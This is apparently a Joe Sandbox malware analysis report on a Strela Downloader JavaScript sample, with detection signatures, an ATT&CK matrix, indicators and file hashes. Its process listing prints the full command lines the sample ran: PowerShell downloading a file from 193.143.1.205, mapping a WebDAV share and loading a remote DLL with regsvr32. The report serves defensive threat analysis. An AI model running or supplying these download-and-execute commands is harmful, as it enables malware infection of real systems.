Windows
Analysis Report
2314572873239327086.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 5652 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\23145 7287323932 7086.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 6648 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user~1 \AppData\L ocal\Temp\ invoice.pd f http://1 93.143.1.2 05/invoice .php"&&sta rt C:\User s\user~1\A ppData\Loc al\Temp\in voice.pdf& &cmd /c ne t use \\19 3.143.1.20 5@8888\dav wwwroot\&& cmd /c reg svr32 /s \ \193.143.1 .205@8888\ davwwwroot \284222991 415498.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6524 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4024 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user~1\Ap pData\Loca l\Temp\inv oice.pdf h ttp://193. 143.1.205/ invoice.ph p" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 7248 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user ~1\AppData \Local\Tem p\invoice. pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7456 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7652 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 12 --field -trial-han dle=1692,i ,183116126 6663569003 0,72246871 9480498353 5,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 7520 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: frack113, Nasreddine Bencherchali: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | Virustotal | Browse | ||
8% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588536 |
Start date and time: | 2025-01-11 02:10:10 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 59s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 25 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 2314572873239327086.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/63@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 162.159.61.3, 172.64.41.3, 3.219.243.226, 3.233.129.217, 52.6.155.20, 52.22.41.97, 2.23.242.162, 23.209.209.135, 199.232.214.172, 2.16.168.105, 2.16.168.107, 23.55.243.68, 23.55.243.74, 23.55.243.72, 23.55.243.85, 23.55.243.77, 23.55.243.70, 192.168.2.7, 13.107.246.45, 20.12.23.50, 104.78.188.188, 52.149.20.212
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, time.windows.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
20:11:09 | API Interceptor | |
20:11:13 | API Interceptor | |
20:11:13 | API Interceptor | |
20:11:21 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7066884883805238 |
Encrypted: | false |
SSDEEP: | 1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq6:2JIB/wUKUKQncEmYRTwh02 |
MD5: | 0233AFA1564C3A5E0A88682788FB7A68 |
SHA1: | 4F0F9794CE7A1C3D29EC02B03600CA2A05C9EBE1 |
SHA-256: | 16C9CCD10D09EA666689EC6B630BCDBDD615EB08EC22B950395A0ECC233CBF34 |
SHA-512: | CABEDF8EDF5C2AD6D3037852B12859179F74DD57A2D15446EB14F6B8C59EE9059618FA92C33E760BB9226BEF2C99F731A7031970EA0E37A61340B72006A5C450 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7899824837518414 |
Encrypted: | false |
SSDEEP: | 1536:TSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:TazaPvgurTd42UgSii |
MD5: | 22BEAEE9C9B3DA2B11B95575857F6AFB |
SHA1: | C276BC1E0408252F12E26F46AA3DF4AD82FEFCAD |
